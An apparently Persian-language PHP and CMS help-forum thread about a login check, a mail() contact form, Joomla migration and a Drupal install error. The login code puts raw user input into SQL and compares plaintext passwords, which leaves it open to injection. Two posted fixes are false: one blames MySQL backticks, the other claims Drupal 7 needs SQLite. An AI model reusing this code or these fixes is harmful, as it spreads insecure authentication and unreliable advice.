$result = mysql_query("SELECT * FROM `access` WHERE `username` = '$username' AND `password` = '$password'");
$result = mysql_num_rows($result);
if($result)
echo "yes";
else
echo "no";
?>

و مشکلاتی که پیشنهاد میشه رفع کنید :

1 - کدتون رو با نظم بنویسید !
2 - به جای print از echo استفاده کنید
3- وقتی دارید بررسی میکنید که یک فرم submit شده قبل از هر کاری باید :

if(isset($_POST['submit']))
{
// Your commands
}
استفاده کنید که ببینید submit شده یا نه !

4 - از عبارات کوتاهتری میتونید برای چک کردن کانکشن دیتابیس استفاده کنید.

و در آخر هم موفق باشید

mrsoroush
12-18-2011, 06:32 PM
ممنون. واقعا دست شما درد نکنه. پاسخ جامعی بود.
اما همین کدی که شما زحمت کشیدید و نوشتید رو امتحان کردم. حالا چه یوزر و پس تو دیتابیس باشه چه نباشه no چاپ میشه! مقدار result$ رو هم چاپ میکنم و مقدار 0 چاپ میشه! (بعد از اعمال تابع mysql_num_rows)
حالا من واقعا نمیدونم چرا؟! چون کاملا راه حل درستی به نظر میاد

mrsoroush
12-18-2011, 07:41 PM
خوب مشکل حل شد و این مشکل فقط بخاطر` ` در کد زیر بود:

<?php
$result = mysql_query("SELECT * FROM `access` WHERE `username` = '$username' AND `password` = '$password'");
?>

درواقع کد تصحیح شده به این صورت است:

<?php
$result = mysql_query("SELECT * FROM access WHERE username = '$username' AND password = '$password'");
?>

با تشکر از دوست عزیزمون CR9

saber2008
12-19-2011, 07:43 PM
با سلام

من تو قالبم یه فرم تماس با دارم میخواستم بدونم که به چه صورت میشه تنظیمش کرد برای ارسال ایمیل

در ضمن کد php اون چیه ؟

با تشکر

Mahdi007
12-19-2011, 07:47 PM
چرا بیش تر توضیح نمیدین و فایل های لازم و نمیزارین تا دوستان بتونن کمکتون کنن ؟

CR9
12-19-2011, 08:24 PM
سلام دوست عزیز

شما این کار رو توسط تابع mail انجام بدین !

یا از کلاس های ارسال میل به صورت سفارشی استفاده کنید ...

برای مثال :


<?php

$Name = "CR9"; //senders name
$email = "[Only registered and activated users can see links]"; //senders e-mail adress
$recipient = "[Only registered and activated users can see links]"; //recipient
$mail_body = "The text for the mail..."; //mail body
$subject = "Subject for reviever"; //subject
$header = "From: ". $Name . " <" . $email . ">\r\n"; //optional headerfields

mail($recipient, $subject, $mail_body, $header); //mail command :)
?>

samaram1
02-03-2012, 09:55 AM
سلام
من رفتم مقداری آموزش دیدم و با نرم افزار لوکال زمپ آشنا شدم و سایتم رو بوسیله جوملای 5 روی کامپیوترم ساختم اما حالا چنتا سوال داشتم ؟
می خواستم بدونم میشه سیو کارم رو روی هاستم آپلود کنم
و آیا بازم جوملا نیازه روی هاست آپلود بشه
فایل سیویم با پسونده 09_01.sql
و نرم افزار مورد استفاده XAMPP Control Pane
و هاستم پلسک 9 است و بعد
آیا میشه که این فایل ساخته شده را در پلسک و در دیتا بیس آپلود کرد

samaram1
02-03-2012, 09:56 AM
سلام
من رفتم مقداری آموزش دیدم و با نرم افزار لوکال زمپ آشنا شدم و سایتم رو بوسیله جوملای 5 روی کامپیوترم ساختم اما حالا چنتا سوال داشتم ؟
می خواستم بدونم میشه سیو کارم رو روی هاستم آپلود کنم
و آیا بازم جوملا نیازه روی هاست آپلود بشه
فایل سیویم با پسونده 09_01.sql
و نرم افزار مورد استفاده XAMPP Control Pane
و هاستم پلسک 9 است و بعد
آیا میشه که این فایل ساخته شده را در پلسک و در دیتا بیس آپلود کرد

Goback
02-03-2012, 12:15 PM
@samaram1


من رفتم مقداری آموزش دیدم و با نرم افزار لوکال زمپ آشنا شدم و سایتم رو بوسیله جوملای 5 روی کامپیوترم ساختم اما حالا چنتا سوال داشتم ؟

تبریک میگم.


می خواستم بدونم میشه سیو کارم رو روی هاستم آپلود کنم

بله.


و آیا بازم جوملا نیازه روی هاست آپلود بشه

بله.

اگر روی هاست جوملا نصب نیست،دوتا راه دارید:
1-بهترین راه نصب مجدد جوملا با همین تنظیمات روی هاسته.
2-اگر دقیقا همینی که روی لوکال هستش رو میخواین آپلود کنین،و تغییراتی روی فایلها و دیتابیس انجام شده،پس ابتدا فایلها رو روی هاست انتقال بدید،بعد فایل SQL مربوط به جوملا رو داخل دیتابیس ایمپورت کنید،در نهایت فایل کانفیگ جوملا رو تغییر بدید به مشخصات روی سرور.

-----
اگر قالب میخواین آپلود کنین،بهتره جوملا رو روی هاست نصب،بعد فقط قالب رو به هاست انتقال بدید.

ali6897
08-26-2013, 03:30 PM
سلام دوستان ؛
من می خام یه Drupal رو روی یک WampServer نصب کنم ولی موقع نصب وقتی بهDatabase configuration می رسه با این error مواجه می شم :

In order for Drupal to work, and to continue with the installation process, you must resolve all issues reported below. For more help with configuring your database server, see the installation handbook. If you are unsure what any of this means you should probably contact your hosting provider.

Failed to connect to your database server. The server reports the following message: SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost' (using password: NO).

Is the database server running?
Does the database exist, and have you entered the correct database name?
Have you entered the correct username and password?
Have you entered the correct database hostname?

میشه کمکم کنین؟ ممنون !

ali6897
08-26-2013, 04:07 PM
بازم سلام ؛
من فکر می کنم جواب سوالمو پیدا کردم !
ورژن Drupal من 7 بود که database سازگار با این ورژن SQLite هست و چون من از MySQL استفاده می کردم error می داد !